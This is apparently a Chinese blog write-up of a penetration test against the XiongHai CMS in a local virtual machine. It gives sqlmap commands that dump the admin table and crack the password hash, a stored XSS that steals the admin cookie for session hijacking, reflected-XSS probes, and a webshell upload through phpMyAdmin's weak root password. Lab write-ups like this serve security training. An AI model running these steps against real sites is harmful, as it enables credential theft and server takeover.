CMS-熊海网站内容管理系统漏洞测试

开门见山

 


 

在虚拟机中搭建网站,本机访问http://192.168.31.68/

 CMS-熊海网站内容管理系统漏洞测试_第1张图片

 

 

 


 

一、SQL注入获取管理员账号密码

 

1. 点开一篇文章,存在get请求参数

 CMS-熊海网站内容管理系统漏洞测试_第2张图片

 

 

 

2. 手工注入无果,使用sqlmap,后跟-p接指定参数,验证是否存在sql注入

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid"

 

 

 

 

 

 

 

3. 爆数据库

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" --dbs

 

 

 

 CMS-熊海网站内容管理系统漏洞测试_第3张图片

 

 

 CMS-熊海网站内容管理系统漏洞测试_第4张图片

 

 

 

4. 爆表

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" -D test --tables

 

 

 CMS-熊海网站内容管理系统漏洞测试_第5张图片

 

 

 CMS-熊海网站内容管理系统漏洞测试_第6张图片

 

 

 

5. 爆字段

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" -D test -T manage --columns

 

 

 

 CMS-熊海网站内容管理系统漏洞测试_第7张图片

 

 

 CMS-熊海网站内容管理系统漏洞测试_第8张图片

 

 

 

6. 爆值

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" -D test -T manage -C user,password --dump

 

 

 

 CMS-熊海网站内容管理系统漏洞测试_第9张图片

 

 

 

7. MD5解密63a9f0ea7bb98050796b649e85481845  为  root

得到管理员的账号密码 admin /root

可以进一步登进后台操作

 


 

二、存储型XSS获取管理员cookie

1. 在xss平台上配置监听端口

 CMS-熊海网站内容管理系统漏洞测试_第10张图片

 

 

 CMS-熊海网站内容管理系统漏洞测试_第11张图片

 

 

 

2. 复制代码,

 CMS-熊海网站内容管理系统漏洞测试_第12张图片

 

 

 

3. 在表单中插入xss脚本

 CMS-熊海网站内容管理系统漏洞测试_第13张图片

 

 

 

4. 发表成功,等待管理员登录后台查看留言,

 CMS-熊海网站内容管理系统漏洞测试_第14张图片

 

 

 CMS-熊海网站内容管理系统漏洞测试_第15张图片

 

 

 

5. 监听段得到服务端反弹过来的信息,得到管理员的cookie

 CMS-熊海网站内容管理系统漏洞测试_第16张图片

 

 

 

6. 找到网站后台,登录抓包

 CMS-熊海网站内容管理系统漏洞测试_第17张图片

 

 

 

cookie替换陈管理员的cookie,并且记得要换上面的目标网址把login.php换成index.php,需要改多个包,发包进入后台

 CMS-熊海网站内容管理系统漏洞测试_第18张图片

 

 

 


 

三、反弹型xss

http://192.168.31.68/?r=content&cid=5'

CMS-熊海网站内容管理系统漏洞测试_第19张图片

 

 

http://192.168.31.68/?r=list&class=3&page=1'

 CMS-熊海网站内容管理系统漏洞测试_第20张图片

 

 


 

四、Phpmyadmin弱口令上传一句话

账号密码为root/root

进去执行SQL上传文件语句

phpinfo.php知道绝对路径

 CMS-熊海网站内容管理系统漏洞测试_第21张图片

 

 CMS-熊海网站内容管理系统漏洞测试_第22张图片

 

 

菜刀连接

 CMS-熊海网站内容管理系统漏洞测试_第23张图片

 

 CMS-熊海网站内容管理系统漏洞测试_第24张图片

 

 

 


 

你可能感兴趣的:(CMS-熊海网站内容管理系统漏洞测试)